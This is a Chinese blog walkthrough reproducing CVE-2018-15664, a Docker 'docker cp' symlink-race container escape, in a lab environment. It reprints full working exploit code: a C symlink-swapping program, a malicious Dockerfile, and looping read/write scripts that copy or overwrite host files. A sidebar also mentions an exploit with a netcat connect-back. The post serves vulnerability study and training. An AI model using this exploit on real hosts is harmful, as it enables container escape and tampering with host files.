CVE-2018-15664复现

最新推荐文章于 2023-11-01 11:43:24 发布
最新推荐文章于 2023-11-01 11:43:24 发布
阅读量4.7k 收藏 1
点赞数 1
分类专栏: 漏洞复现 云原生安全:攻防实践与体系构建 文章标签: docker 容器 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41667409/article/details/121475142
版权

CVE-2018-15664:符号链接替换漏洞

前置知识

docker cp用于容器和宿主机文件系统之间进行文件或目录复制

//将主机/www/xxx文件拷贝到容器96f7f14e99ab的/www目录下(若是/www,则是拷贝到容器根目录下,重命名为www)
docker cp /www/xxx 96f7f14e99ab:/www/

//将容器96f7f14e99ab下的/www目录拷贝到主机的/tmp目录中
docker cp  96f7f14e99ab:/www /tmp/

漏洞介绍

存在:18.06.1-ce-rc2版本之前的Docker中

docker cp命令对应的后端API存在基于竞争条件的符号链接替换漏洞,能够导致目录穿越。

可以利用此漏洞逃逸出容器读取或篡改host其他任意容器内的文件。

其实是一个TOCTOU(time-of-check to time-of-use),使用FollowSymlinkInScope函数时触发文件系统的竞争条件缺陷导致,属于竞态条件漏洞

  • 竞态条件漏洞,即程序对某对象进行安全检查和使用该对象的步骤之间存在间隙,攻击者可以先构造并放置一个能够通过安全检查的合法对象,顺利通过目标程序的安全检查流程,然后在执行之前立即使用恶意对象替换之前的合法对象。

  • FollowSymlinkInScope作用:解析容器运行中运行进程的文件路径。攻击者就利用解析校验完成之后和操作执行间的空隙,修改cp文件,改为一个符号链接对应的目标文件

    • Docker daemon收到docker cp的请求,会对复制的路径进行检查,如果路径中有容器内的符号链接,就先在容器内部将其解析成路径字符串,留待后用

  • 真实过程:Docker daemon检查复制路径时,攻击者放置正常的非符号连接的常规文件或目录,在检查结束之后、docker daemon使用路径前,将其替换成符号连接

  • 利用条件:

    • hacker需要有docker cp的使用权限和目标容器的访问权限
    • 解析文件,到完成cp的动作,是毫秒级,攻击难度较大

搭建环境

使用Metarget提供的靶场环境

35  git clone https://github.com/Metarget/metarget.git
38  cd metarget/
55  apt install python3-pip
57  pip3 install docker
58  ./metarget cnv install cve-2018-15664
59  pip3 install tqdm
60  ./metarget cnv install cve-2018-15664
61  pip3 install packaging
62  ./metarget cnv install cve-2018-156
63  pip3 install bs4
64  ./metarget cnv install cve-2018-156
65  pip3 install prettytable
66  ./metarget cnv install cve-2018-156
67  apt install curl
68  ./metarget cnv install cve-2018-156

请添加图片描述

请添加图片描述

poc:

https://github.com/Metarget/cloud-native-security-book/tree/main/code/0302-%E5%BC%80%E5%8F%91%E4%BE%A7%E6%94%BB%E5%87%BB/02-CVE-2018-15664/symlink_race

请添加图片描述

Dockerfile

用来制作恶意镜像

构建漏洞利用程序symlink_swap并将其放在容器根目录下,并在根目录下创建一个w00t_w00t_im_a_flag文件,内容为FAILED – INSIDE CONTAINER PATH

容器启动后执行程序(Entrypoint)即为/symlink_swap

# Build the binary.
## 拉取suse linux的基础镜像
FROM opensuse/leap
## 安装gcc glibc-devel-static
RUN zypper in -y gcc glibc-devel-static
RUN mkdir /builddir
## 构建漏洞利用程序symlink_swap,并将其放在容器根目录下
COPY symlink_swap.c /builddir/symlink_swap.c
RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c

# Set up our malicious rootfs.
FROM opensuse/leap
ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag
ARG SYMSWAP_PATH=/totally_safe_path
RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET"
COPY --from=0 /builddir/symlink_swap /symlink_swap
# 容器启动后执行的程序(Entrypoint)即为/symlink_swap
ENTRYPOINT ["/symlink_swap"]
知识点:
多阶段构建

多个FROM指令不是为了生成多根的层关系,最后生成的镜像,仍以最后一条FROM为准,之前的被抛弃。

每个FROM指令都是一个构建阶段,多条FROM就是多阶段构建。虽然之前的FROM会被抛弃,但是前置阶段的文件拷贝到后边的阶段中,这就是多阶段构建的最大意义。

这里做到的效果就是将编译环境和运行环境分离

构建阶段还可以进行命名,如:

# syntax=docker/dockerfile:1
FROM golang:1.16 AS builder
WORKDIR /go/src/github.com/alexellis/href-counter/
RUN go get -d -v golang.org/x/net/html  
COPY app.go    ./
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app .

FROM alpine:latest  
RUN apk --no-cache add ca-certificates
WORKDIR /root/
COPY --from=builder /go/src/github.com/alexellis/href-counter/app ./
CMD ["./app"]

默认情况下,阶段没有命名,可以通过整数来引用他们,整数从0开始。

这种请下,即使dockerfile中的指令后面重新排序,COPY也不会中断

ARG vs ENV
  • arg是在build的时候存在,可以在Dockerfile中当作变量来使用(ARG专门为构建镜像而生)
  • env是容器构建好之后的环境变量,不能在Dockerfile中当参数使用
symlink_swap

容器内漏洞利用源代码

在容器内创建指向根目录“/”的符号链接,并不断的交换符号链接(由命令行参数传入,如“/totally_safe_path”)与一个正常目录(例如“/totally_safe_path-stashed”)的名字。这样一来,宿主机执行docker cp时,首先检查到“/totally_safe_path”是一个正常目录,但是后面执行复制操作时“/totally_safe_path”却变成了一个符号链接,那么Docker将在宿主机上解析这个符号链接

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

#define usage() \
        do { printf("usage: symlink_swap <symlink>\n"); exit(1); } while(0)

#define bail(msg) \
        do { perror("symlink_swap: " msg); exit(1); } while (0)

/* No glibc wrapper for this, so wrap it ourselves. */
#define RENAME_EXCHANGE (1 << 1)
int renameat2(int olddirfd, const char *oldpath,
              int newdirfd, const char *newpath, int flags)
{
        return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);
}

/* usage: symlink_swap <symlink> */
int main(int argc, char **argv)
{
        if (argc != 2)
                usage();

        char *symlink_path = argv[1];
        char *stash_path = NULL;
        if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0)
                bail("create stash_path");

        /* Create a dummy file at symlink_path. */
        struct stat sb = {0};
        if (!lstat(symlink_path, &sb)) {
                int err;
                if (sb.st_mode & S_IFDIR)
                        err = rmdir(symlink_path);
                else
                        err = unlink(symlink_path);
                if (err < 0)
                        bail("unlink symlink_path");
        }

        /*
         * Now create a symlink to "/" (which will resolve to the host's root if we
         * win the race) and a dummy directory at stash_path for us to swap with.
         * We use a directory to remove the possibility of ENOTDIR which reduces
         * the chance of us winning.
         */
        if (symlink("/", symlink_path) < 0)
                bail("create symlink_path");
        if (mkdir(stash_path, 0755) < 0)
                bail("mkdir stash_path");

        /* Now we do a RENAME_EXCHANGE forever. */
        for (;;) {
                int err = renameat2(AT_FDCWD, symlink_path,
                                AT_FDCWD, stash_path, RENAME_EXCHANGE);
                if (err < 0)
                        perror("symlink_swap: rename exchange failed");
        }
        return 0;
}

属于竞态条件漏洞,不是每次都能复现,为了增大触发几率,需要在宿主机上不断执行docker cp命令

run_read.sh和run_write.sh模拟受害者在宿主机上不断执行docker cp命令

run_write.sh

宿主机cp到容器内的场景,触发漏洞,指定的宿主机文件将覆盖容器内恶意符号链接在宿主机文件系统解析后指向的文件

#!/bin/bash

SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag

# Create our flag.
echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 0444 "$SYMSWAP_TARGET"

# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
        --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
        --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")

echo "SUCCESS -- HOST FILE CHANGED" | tee localpath

# Now continually try to copy the files.
while true
do
        docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET"
done
run_read.sh

模拟docker cp将容器内文件复制到宿主机上场景,一旦触发,容器内恶意符号链接在宿主机文件系统解析后指向的文件将被复制到受害者设定的宿主机目录下

#!/bin/bash

SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag

# Create our flag.
echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 000 "$SYMSWAP_TARGET"

# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
        --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
        --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")

# Now continually try to copy the files.
idx=0
while true
do
        mkdir "ex${idx}"
        docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out"
        idx=$(($idx + 1))
done

实验成功:

请添加图片描述

出题:

思路:给出含有漏洞的容器,然后将flag写在宿主机上,从容器中读取写在宿主机上某个文件中的flay值

参考文献:

云原生安全:攻防实践与体系构建

CVE-2018-15664漏洞分析报告-阿里云开发者社区 (aliyun.com)

Getting it done.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: python CVE-2018-8174.py -u -o exp.rtf -i 2.2.2.2 -p 4444 将exploit.html放在您的服务器上(1.1.1.1) netcat收听[any] 4444(2.2.2.2) 好好享受 !
CVE漏洞-CVE-2018-15664 符号链接替换漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-04 382
docker cp 命令用于再Docker创建的容器与宿主机文件系统之间进行文件或目录制。
【新书速递】应用上云成必然趋势,“安全左移”是云原生安全的必经之路?...
华章IT官方博客
11-01 370
云计算一经走向市场,就迅速呈出强大的生命力。随着大数据时代的到来,云计算成为大数据的承载平台,“云计算+大数据+人工智能”成为新基建的核心。云计算也因大数据、人工智能的不断发展而成为信息...
云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)
最新发布
告白的博客
11-01 1714
上面可以看到逃逸的种类的以及其中的方法很多,但是实际环境中,是时间紧任务重,一步步的尝试逃逸难免有些费事,这里列举两种工具,CDK和check,集成了自动逃逸方法检测,CDK还集成了对应的poc实一键逃逸,满足下列的版本时候,可以尝试该docker漏洞逃逸提权,详细的实验过程这里不作赘述,相关的操作网上也有大量的文章,但是实际的环境去逃逸,还是就事论事,会有许多的其他情况发生。CDK的自动化逃逸中包含了挂载,特权等许多的自动化利用,上述的两种逃逸类型为docker的漏洞,分别是。
【云攻防系列】从攻击者视角聊聊K8S集群安全(上)
yy1715713348的博客
07-21 458
作为云原生管理与编排系统的代表,Kubernetes(简称K8S)正受到越来越多的关注,有报告[1]显示,96% 的组织正在使用或评估K8S,其在生产环境下的市场占有率可见一斑。K8S 的功能十分强大,其系统杂性也同样较高,一般而言,程序越杂则越容易存在安全问题,自然而然地,K8S 集群也同样面临着严重的安全威胁,如 K8S组件的未授权访问、容器逃逸和横向攻击等。我们说攻和防是相互促进、相伴而生的,作为相关安全人员首先应该从整体上把握业务架构可能面临的安全威胁才有可能做好防护。
docker容器内漏洞_如何在2020年发和修Docker容器漏洞
cumi6497的博客
08-16 2540
docker容器内漏洞Containerization allows engineering teams to create a sandbox environment in which to run and test applications. Containers are mostly made up of open-source images pulled in from docker hu...
Nuxeo 认证绕过和RCE漏洞分析(CVE-2018-16341)
weixin_30700977的博客
12-26 414
简介 Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS)。nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页面上,而错误页面会当成模板被解析,文件名包含表达式也会被输出同时被解析执行,从而导致远程代码执行漏洞。在漏洞挖掘过程中发nuxeo-jsf组件默认在10.2没有安装,历史版本是默认就安装的。可以通...
虹科案例|安全性防护平台-海康威视摄像机中的重大漏洞
Hongke_IIOT的博客
05-19 2874
前言 我们Vdoo的安全研究团队对领先的物联网产品和安全设备进行了大规模的安全研究,为了提高效率和透明度,此过程设备供应商也参与其中。 这项研究的一部分是研究人员在多家供应商的设备中发了零日漏洞。这些漏洞我们已经负责任地以最佳方式向供应商披露,并将在披露期限结束后逐步分享。 我们发易受攻击设备的供应商之一是海康威视。研究团队在海康威视安全摄像机中发了一个漏洞。攻击者利用该漏洞能成功获取摄像机IP地址,并且使用摄像机的root特权(通过LAN或Internet)远程执行代码。虹科Vdoo负责任地披露了
docker公共存储库_查找并修docker镜像安全漏洞
weixin_39595621的博客
12-20 432
容器的出使开发团队可以创建沙盒环境,以在其中运行和测试应用程序,容器主要由从 docker hub 或其他公共镜像存储库提取的开源镜像组成。但是这些开源镜像有时可能包含一些漏洞,这些漏洞可能会危害容器的安全,进而危害其主机/服务器。由于这些容器在主机上运行,因此如果容器不受保护,就可以劫持生产中的容器。此类攻击的一个很好的例子是特斯拉对未受保护的 Kubernetes 集群的加密劫持攻击。在此攻...
PDF漏洞(CVE-2018-12794)浅析
weixin_33757911的博客
05-08 738
漏洞简介 CVE-2018-12794属于类型混淆漏洞,产生漏洞原因是通过构建XML数据包(XML Data Package,XDP)模版,并对XML表单体系结构(XML Forms Architecture,XFA)对象执行某些JavaScript操作,***者就可以强制Adobe Reader从模版对象的边界引用数据。 2018年7月份,Adobe补丁更新: 漏洞基本信息 漏洞ID:CVE-...
CVE-2018-3252:CVE-2018-3252-PoC
03-18
CVE-2018-3252-PoC 1.使用YSOSERIAL生成PoC 2.您应该知道目标weblogic服务器的USERNAME和PASSWORD 3.将有效载荷发送到URL POST /bea_wls_deployment_internal/DeploymentService ...
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。环境设定docker-compose up -d请耐心等待,第一次的过程可能会很长...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
应用安全-软件安全-漏洞CVE整理
weixin_30872157的博客
07-01 622
HFS(文件共享) HFS远程命令执行 phpmyadmin(mysql数据库管理工具) phpmyadmin弱密码 phpmoadmin(mongoDB管理工具 ) phpmoadmin远程代码执行Elasticsearch(搜索服务器) elasticsearch远程命令执行 Elasticsearch未授权访问漏洞 Elasticsearch任意文件读取 "受...
一个未打补丁的漏洞影响所有版本的 Docker !
liqiuman180688的博客
06-03 330
文章来源: 云头条 所有版本的Docker目前都容易受到一种竞态条件(race condition)的攻击,这种竞态条件可能使攻击者对主机系统上的任何文件拥有读取权限和写入权限。概念验证代码已发布。 该漏洞类似CVE-2018-15664,它为黑客修改资源路径提供了一个机会窗口,这个机会窗口出在路径被解析之后,但被分配的程序开始对资源进行操作之前的时间点。这被称为检查时间/使用时间(TOC...
云原生生态周报 Vol. 7 | Docker 再爆 CVE
weixin_33785972的博客
06-11 148
业界要闻Docker 基础镜像 Alpine 爆出提权漏洞(CVE-2019-5021):该CVE影响自 Alpine Linux 3.3 版本开始的所有 Docker 镜像。该漏洞的机制在于 Alpine 的 root 用户包含一个空密码,这可能会导致攻击者获得 root 权限,进而造成攻击。报告中称:受影响范围是 Alpine Linux Docker 镜像 3.3、3.4、3.5、3.6、3...
安全漏洞干货-linux漏洞修命令
明哥哥知识分享
09-23 772
1、漏洞名称:RHSA-2019:2197: elfutils security,bug fix,和 enhancement update 修命令:yum update elfutils-default-yama-scope -y &&yum update elfutils-libelf -y &&yum update elfutils-libs -y cve编号:CVE-2018-16062,CVE-2018-16402,CVE-2018-16403,CVE-2018-1
漏洞#CVE-2022-0847(Linux内核提权)
weixin_52763014的博客
09-13 275
使用uname -r命令,查看当前内核版本,一般在 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102版本以内,可以受影响。如果你使用的是linux18.04版本安装起来应该是没什么问题,由于我已经安装过了,所以这里不展示效果。可以看到有很多,你可以找一个你看的顺眼的,我这里使用的是/bin/ping。环境配置时间可能较长,可以同上面链接,了解漏洞,如何产生以及漏洞特性。好的失败了,那位大佬的文章的一样没成功,我抱着侥幸的心里试试,也不行。漏洞(两个方法)
cve-2018-1297环境
08-03
CVE-2018-1297是一个Apache Struts框架中的严重漏洞。此漏洞允许攻击者通过精心构造的恶意请求来执行任意命令,从而完全控制服务器。 要CVE-2018-1297漏洞,需要以下步骤: 1. 设置实验环境:首先,需要准备一个安装了Apache Struts 2.3.x版本的服务器。可以使用轻量级的虚拟机或Docker容器等方式来创建这个环境。 2. 构造恶意请求:接下来,需要使用恶意的HTTP请求来触发漏洞。可以使用各种工具(如Curl、Postman等)来构造并发送这个请求。 3. 利用漏洞:恶意请求的主要目的是通过使用特定的参数和数据,来构造一个命令执行的payload。这个payload会被传递给Struts 2框架,从而触发漏洞并执行攻击者所期望的命令。 4. 验证漏洞:在恶意请求被发送之后,可以通过查看服务器日志或其他输出来验证是否成功触发了CVE-2018-1297漏洞。如果成功,攻击者将获得完全的远程访问权限。 5. 漏洞修:一旦漏洞被成功和验证,需要立即采取措施来修漏洞。这可能包括更新Apache Struts框架到最新版本,或者应用官方提供的安全补丁程序。 总结而言,要CVE-2018-1297漏洞需要设置实验环境、构造恶意请求、利用漏洞以及验证漏洞。这个漏洞的严重性需要及时修和部署补丁以确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值